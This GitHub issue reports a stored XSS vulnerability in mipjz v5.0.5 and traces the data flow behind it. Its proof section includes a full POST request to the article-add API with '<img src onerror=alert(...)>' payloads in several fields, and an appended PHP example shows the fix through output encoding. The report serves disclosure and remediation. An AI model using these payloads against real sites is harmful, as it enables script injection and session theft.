sansanyun/mipjz

There is a cross site scripting (XSS) vulnerability in mipjz v5.0.5

sma11new opened this issue · 1 comment

[Vulnerability Description]
Cross Site Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}


  2. Visit the article page; the code is loaded and executed


[Code Details]

  1. Add an article; the controller receives the parameters and passes them to \app\article\model\Articles.php:itemAdd for processing


  2. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database


  3. Article Details \app\article\controller\ArticleDetail.php:index takes the article description out of the database and passes it to $mipDescription without filtering


  4. In the "guess you like" area of the article display \template\default\article\articleDetail.html, the $mipDescription from the previous step is output directly, causing the malicious code to be executed

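The sink described in the code details above, shown as an added PHP example rather than mipjz's own code: the stored description reaches the "guess you like" markup unencoded, and the fix is to HTML-encode it at the output boundary. The function names and the surrounding markup are hypothetical; only the variable name $mipDescription and the sample description value come from the report.

```php
<?php
// Added example, not mipjz's code. Function names and markup are hypothetical;
// $mipDescription and the sample value are taken from the report above.

declare(strict_types=1);

/**
 * Encode a stored article description for safe insertion into HTML.
 * ENT_QUOTES also encodes ' and " so the value is safe inside attributes;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
 */
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Vulnerable pattern: the raw database value is interpolated into the
 * template output, which is what the report describes for articleDetail.html.
 */
function renderGuessYouLikeVulnerable(string $mipDescription): string
{
    return '<p class="desc">' . $mipDescription . '</p>';
}

/**
 * Hardened pattern: encode at the output boundary. Storing the raw text is
 * acceptable; what must never happen is emitting it unencoded into HTML.
 */
function renderGuessYouLikeSafe(string $mipDescription): string
{
    return '<p class="desc">' . encodeForHtml($mipDescription) . '</p>';
}

// Constructed sample: the description value from the request in the report.
$stored = 'xss<img src onerror=alert(22)>';

$vulnerable = renderGuessYouLikeVulnerable($stored);
$safe       = renderGuessYouLikeSafe($stored);

// The hardened output must contain no raw tag; fail loudly if it does.
if (strpos($safe, '<img') !== false) {
    throw new RuntimeException('output encoding failed');
}

echo "vulnerable: {$vulnerable}", PHP_EOL;
echo "safe:       {$safe}", PHP_EOL;
```

Encoding before the value is assigned to $mipDescription covers templates that print variables raw; if the template engine in use provides an escaping filter, applying it at every output of $mipDescription is equivalent (which mechanism mipjz's engine offers is not confirmed by the report, so this is an assumption). Input validation on itemAdd is a useful second layer but does not replace output encoding, since the same stored value may be rendered in more than one context.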

What level of authentication does this require?